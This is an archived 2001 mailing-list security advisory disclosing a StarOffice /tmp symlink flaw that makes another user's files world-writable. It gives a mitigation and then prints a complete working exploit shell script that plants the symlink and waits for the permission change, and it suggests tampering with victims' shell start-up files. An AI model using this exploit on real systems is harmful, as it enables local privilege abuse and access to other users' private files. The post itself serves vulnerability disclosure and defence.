From: Murat Koc (murat.koc@frontsite.de)
Date: Tue 20 Feb 2001 - 21:58:35 EET
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
- - = Helios Security and Administration = -
Hi everyone,
StarOffice creates a temporary directory in /tmp called soffice.tmp,
with permissions 0777. Into this directory other temporary files are creates,
with the format: svZZZZ.tmp, where ZZZZ in a four or five digits number.
StarOffice not only create the /tmp/soffice.tmp directory with
permissions 0777, but also chmod() it sometimes when StarOffice is runing
afterwards. If any user create a symbolic link from /tmp/soffice.tmp to any
file owned by other user, when this last user run StarOffice the target of
the link will become 0777. So, if the directory of the target file is
accessible by the maliciosous user that created the symlink, he can do
whatever he wants with the file. A few ways to exploit this is:
- to modify shell start-up files (as .profile, .bashrc, .cshrc, etc.)
to execute whatever the hackers wants next time victim logs in.
- to gain access to private files with sensitive information, as
passwords files, mail spool files, etc.
- a lot of more evil acts.
StarOffice no give error message or such when it change the
permissions of the target file, so from the victim point of view: all is
going right ;-)
Requeriments:
- Access to the targe file directory needed.
- The target file must NOT be executable.
Fix:
One way to fix the problem is to create a directory inside your
home directory which is inaccessible to anyone but yourself (permissions
700), called tmp. Then insert an entry in your login start-up file to set
the $TMP environment variable to $HOME/tmp, so it will direct StarOffice to
use your temporary directory, rather than the system /tmp. Something like
this (in bash):
[wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
(not permanent)
or modify the .bash_profile adding TMP=$HOME/tmp and including this
variable in the export.
Here is the xploit code, to make sure that this will work, run first
staroffice, so you will become owner of /tmp/soffice.tmp, necessary to remove
it and create the symlink.
#!/bin/sh
SOFFICE="/tmp/soffice.tmp"
TARGETFILE=$1
if [ $# != 1 ]; then
echo
echo " - = HeliSec - Helios Security and Administration = -"
echo "Usage : "
echo "./soffice.sh <file>"
echo "Set 0777 permissions to any file (access to the directory of the
file needed)" echo " JeT Li -The Wushu Master-"
exit
fi
if [ ! -f ${TARGETFILE} ]; then
echo "Target file must exist"
exit
fi
rm -rf ${SOFFICE}
ln -sn ${TARGETFILE} ${SOFFICE}
echo
echo "Symbolik link done ..."
echo
perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ?
print "StarOffice is running on this machine ... wait a minutes and
the permissions will have been set.\n" :
print "StarOffice is not running on this machine ...you may wait for
the signal (not recommended) or CTRL+C the program; when the user
run StarOffice the permissions will be set automaticly\n";'
while :
do
if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then
echo
echo "Permissions set succesfully ... good luck ;-)"
echo
echo "- = HeliSec - Helios Security and Administration = -"
echo " JeT Li -The Wushu Master-"
exit
fi
done
Cheers,
JeT Li -The Wushu Master-
MURAT KOC
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iQIXAwUBOpLK6L6uWt8ry/OwFAOFHgf/R9HmQi+8Qoce118MRohbTEzr+ktuCYUh
BY54ObS5owDZXe7FgBlt0rWv9OpmGiPd0yYijyaoNSmTFvJkSb9PV89syw0DYCxU
Sp/8YHjp8WYJxb6dBNuKyzGi3nulhMfR4NAeF/kjkYQlaPOizEl/UY63UHtrl+/V
Ahx8+7tZLiAM6nqgkTn/C3gKGdSQPllW2MSu2BxwrXxKVtja8FFzBUY99SW6hCwR
0Mk77ffMC9kGL6NVgGfWvjrbCL76/DL1ldGnWZJAkYBSAHst8wRAi2Php1T9MY7m
qSqkQEdyEJbeu77CzD20WsrodeFGErAk1mxmkHtM+Yck3KvGGN+MWwf/YLY42kck
qr139OJyW4wiZF2A5rE9f8Gcx2ZdooBbhIuQAkqUkePZ8EmjdOJCH1GxRS0BBkWH
5IFA/B1g30beGhflwLiy0Arp5zOGXyU8mdubxqpPUfBjv65IxgaDTLBytPHm25QR
oQTA6Y+Wkrx/jZlIcb2bMB8xzZWXt5rAZhZf2tdRK3puiXglq/eht0aM5hgdqDD3
u+kqT7ha3251UW39SwPSMy0YIDuJLOxcjCycUNiepSVzS35j8SiII6ZsOe2nb+HI
RxtBrSRRCZ3ZhL7WN2z9NBIVFfADRtwmfrhTv22ccheHn8EUQFIUwgFMy7vonDzH
QdT7+WExWWavCQ==
=U354
-----END PGP SIGNATURE-----
Listeden cikmak icin:
unsub linux
mesajini listeci@bilkent.edu.tr adresine gonderiniz.
Lutfen Listeci icin MIME / HTML / Turkce Aksan kullanmayin.
Listeci arayuzu: http://listweb.bilkent.edu.tr/yardim/bilkent/linux.html
Liste arsivinin adresi: http://listweb.bilkent.edu.tr/